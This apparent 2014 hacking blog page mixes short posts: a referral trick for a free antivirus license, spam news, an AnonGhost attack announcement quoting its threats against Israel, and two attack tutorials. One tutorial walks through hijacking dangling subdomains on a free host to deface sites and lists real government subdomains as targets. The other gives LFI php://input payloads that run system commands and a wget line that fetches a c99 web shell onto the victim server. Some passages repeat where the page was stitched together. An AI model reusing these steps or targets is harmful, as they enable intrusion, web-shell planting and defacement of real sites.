Sunday, 16 March 2014
Labels:
Tricks
Step 03:- Click the “Recommend” tab and then select on LINK option and copy the recommendation link
Read More
How to get avast! Internet Security license for free
How to get avast! Internet Security license for free
Avast, the most trusted antivirus in the world. In business for over 25 years, AVAST is one of the pioneers in the computer security business, with a portfolio covering everything from free antivirus for PC, Mac, and Android. Today, I got a 2 year license(see the above picture) for free from avast by recommending avast to others. You can also get the Premium license key by recommend others. Just follow the below steps to get into the recommendation process. 
Avast Internet Security Features:
Intelligent Antivirus with new DynaGen technology
Anti-malware Protection
Anti-spyware & anti-rootkit
avast! Community IQ
Software Updater maintenance tool
Streaming virus database updates
Browser Cleanup, for tidy web surfing
New user-friendly interface
Enhanced touch screen navigation
Boot-time malware scanning & much more.
Step 02:- After installing, Login or signup for an AVAST account at my.avast.com
Step 04:-Then Promote the copied link on your blog or social media accounts (facebook, twitter etc) and encourage others to use Avast
That’s all, Each successful recommendation gets you closer to a free license of avast! Internet Security.
I hope you’ll enjoy this post
Labels:
Cyber News
Read More
PTA have decided to block SMS service Of Spammers
PTA (Pakistan telecommunication authority) have decided to block SMS service of those mobile connections which send more than 200 SMS in the duration of 15 minutes, to stop Spam and illegal marketing unwanted SMS messages.
PTA is efforting to stop illegal marketing and unwanted SMS spam for a better and peaceful SMS community in Pakistan.
PTA have said that those mobile connection who will be sending more than 200 SMS within the duration of fifteen minutes will face SMS service blockage.
Then customer will have to contact PTA to request for SMS service restoration. PTA sometimes ask customers for sending letter also to the PTA headquarters address. Customer’s SMS service will be restored but if customer repeats, his SMS service will be blocked permanently
Friday, 14 March 2014
Labels:
Cyber News
Read More
AnonGhost Announces another Cyber Attack over Israel on 7th April 2014
AnonGhost have announced another Cyber Attack over Israel on 7th April 2014. the Operation which is Named as "Op Israel Birthday" was announced few days back with a Official Video release Over Youtube.
Israel is one of the biggest target of Muslim hackers around the globe, And with addition to daily Attacks by Hackers they have already suffered several Cyber Attacks in the past few years including #OpIsrael #OpIsraelReborn and several others.
And this time, the Cyber Attack announced almost 3 months before the Final day, it seems like Hackers will be able to reunify and prepare before the attack, The Operation is already being promoted over social Networks for more and more Participation.
The Official Video release on Youtube, depicts War crime and Violence, The Video also delivers a short message to Israel.
Hi Israel!!
We are AnonGhost Team!!
We are always here to punish you, as we did in the last operation on the 7th of April..
And we are back again to celebrate it, Because we are the voice of Palestine and we will not remain silent.
Muslims are Everywhere.
Israel Doesn't exist its only Palestine...
The 7th of April every year will be a Victory celebration..
We are proud of what we did before and after 1 year we are capable to take this to another level..
We won't forgive your Crime against our brothers in Palestine..
You better watch.
and Expect us.
Looking over the previous few attacks, It is possible that the Cyber attack this time can cause Israel to face cyber Blackout on the final day including big leaks, Defacement and bringing Down Government websites.
Thursday, 13 March 2014
Labels:
Tutorials
So let see the DNS Hijacking Vulnerablity making Thousends of Websites hosted on 000webhost and other free hosting webhosting Proivders.
Step 1 : signup for a account on 000webhost.com
it will give you a address like abcd.something.com
for example mine was : http://testingfu.comule.com
Now Goto cPanel
and Look for IP Adress, you'll get something like "31.170.163.140"
Now Goto Bing .com and type dork ip:31.170.163.140
if you want .gov .edu or any other particular domain then dork will " ip:31.170.163.140 .gov "
or " ip:31.170.163.140 .edu "
all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253
Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253
Server 3 with 242 ips
31.170.163.1 - 31.170.163.241
Read More
000webhost DNS Hijacking Vulnerablity
So let see the DNS Hijacking Vulnerablity making Thousends of Websites hosted on 000webhost and other free hosting webhosting Proivders.
Step 1 : signup for a account on 000webhost.com
it will give you a address like abcd.something.com
for example mine was : http://testingfu.comule.com
Now Goto cPanel
and Look for IP Adress, you'll get something like "31.170.163.140"
Now Goto Bing .com and type dork ip:31.170.163.140
if you want .gov .edu or any other particular domain then dork will " ip:31.170.163.140 .gov "
or " ip:31.170.163.140 .edu "
all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253
Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253
Server 3 with 242 ips
31.170.163.1 - 31.170.163.241
Now come to Search Results
i got The Target csirt.gov.bd
i just open this url :
abcd.csirt.gov.bd
and here a error page of 000webhost.
which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost
now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :
men.csirt.gov.bd
bd.csirt.gov.bd
and done added a deface page to my public_html
and the website defaced .
Some of the sites for example which are vulnreable for this attack
i got The Target csirt.gov.bd
i just open this url :
abcd.csirt.gov.bd
and here a error page of 000webhost.
which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost
now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :
men.csirt.gov.bd
bd.csirt.gov.bd
and done added a deface page to my public_html
and the website defaced .
Some of the sites for example which are vulnreable for this attack
http://test.fraymamertoesquiu.gov.ar
http://test.concejodeitagui.gov.co
http://dns.hviota.gov.co
http://test.digitizeyou.in
http://men.csirt.gov.bd
http://bd.csirt.gov.bd
Labels:
Tutorials
Read More
LFI EXPLOITATION VIA PHP://input
Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.
So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.
First things first, give it a shot and see if you can read "/etc/passwd"
URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll be having a page that looks like this:
 |
Now lets try reading:
Code:
/proc/self/environ/proc/self/fd
So URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environhttp://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
|
Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"
I'll show you how to exploit via php://input using the "Hackbar"
So lets check what we're supposed to use in the Hackbar
|
Now let's try putting this method in action.
Look at the picture carefully.
|
URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
<? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now shall we.
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
This is how it's gonna look like.
|
Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
Subscribe to:
Posts
(
Atom
)
